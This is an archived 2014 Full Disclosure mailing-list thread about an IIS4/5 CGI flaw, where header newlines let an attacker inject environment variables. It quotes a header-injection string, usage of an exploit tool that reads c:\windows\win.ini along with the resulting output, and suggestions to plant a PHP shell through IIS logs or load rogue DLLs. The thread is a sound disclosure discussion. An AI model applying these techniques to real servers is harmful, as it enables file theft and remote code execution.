Full Disclosure mailing list archives
Re: iis cgi 0day
From: YiFei Yang <le.concorde.4590 () gmail com>
Date: Fri, 11 Apr 2014 09:15:52 +0800
2014年4月11日 上午6:29于 "Wendel Guglielmetti Henrique" <wsguglielmetti () gmail com
写道: Hey YiFei, Interesting. Is there any CVE for it?
I'm not able to find a CVE related to it, so maybe not.
What you mean by CGI with IIS? Just real old CGI files?
Yes, that's what the original post is talking about. Using CGI programs with IIS4/5.
Can you give an example of remote code execution?
I don't have an example, but what the original post said is that, since you can set any environment variable you want, you may as well modify PATH so that it will point to a folder that contains rogue DLLs to be loaded, or by setting a really long one, cause some CGI programs that assumes environment variables' length to overflow their buffer. The way it works is that IIS4/5 converts a \n to a \0 when processing the request header, and it prepends HTTP_ to the header name to make a environment variable for the CGI process. If you send a request that have a header like "a=b\nPATH_TRANSLATED: something", it will become "HTTP_a=b\0PATH_TRANSLATED=something" when IIS process it, and the part after the \0 will become a seperate environment variable. The information above is translated from the original post, I haven't tried the exploit yet, but I will try that when I have some time to spare.
Thanks. On Thu, Apr 10, 2014 at 2:19 AM, YiFei Yang <le.concorde.4590 () gmail com>
wrote:
So, for you who doesn't read Chinese, here's the brief idea of the
original
post. It is a bug affecting IIS4/5 using CGI on Windows NT/2000. Microsoft is aware of it and won't fix it. The discovery of the bug was back in year 2011. By exploiting this bug, the attacker can set arbitrary environment variables for the CGI process on the target machine, which can be further exploited to get sensitive information, or cause remote code execution. 2014-04-10 10:25 GMT+08:00 yuange <yuange1975 () hotmail com>:Discovered in 2000 for IIS4\IIS5 0day. .php -> php.exe the exploit file ver 4.1.1 . http://seclists.org/fulldisclosure/2012/Apr/13 usage: iisexp411 127.0.0.1 /AprilFools'Day.php PATH_TRANSLATED c:\windows\win.ini yuan can get the file c:\windows\win.ini HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 10 Apr 2014 02:11:37 GMT Connection: close X-Powered-By: PHP/4.0.0 Content-type: text/html ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] asf=MPEGVideo asx=MPEGVideo ivf=MPEGVideo m3u=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpv2=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wvx=MPEGVideo [SciCalc] layout=0 You can use the IIS log file write phpshell, execute the PHP call
system
cmd.Date: Wed, 9 Apr 2014 23:11:28 +0300 From: kirils.solovjovs () kirils com To: yuange1975 () hotmail com Subject: Re: [FD] iis cgi 0day Sorry, I don't read Chinese. How is this a 0day? -- Kirils Solovjovs_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/-- Wendel Guglielmetti Henrique http://wsec.110mb.com/ - Personal HomePage
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- iis cgi 0day yuange (Apr 09)
- Message not available
- Re: iis cgi 0day yuange (Apr 09)
- Message not available
- <Possible follow-ups>
- Re: iis cgi 0day YiFei Yang (Apr 10)
- Message not available
- Re: iis cgi 0day YiFei Yang (Apr 10)
- Message not available
- Re: iis cgi 0day Davide Davini (Apr 16)
- Re: iis cgi 0day Reindl Harald (Apr 16)
- Re: iis cgi 0day Homer Parker (Apr 18)
- Re: iis cgi 0day YiFei Yang (Apr 18)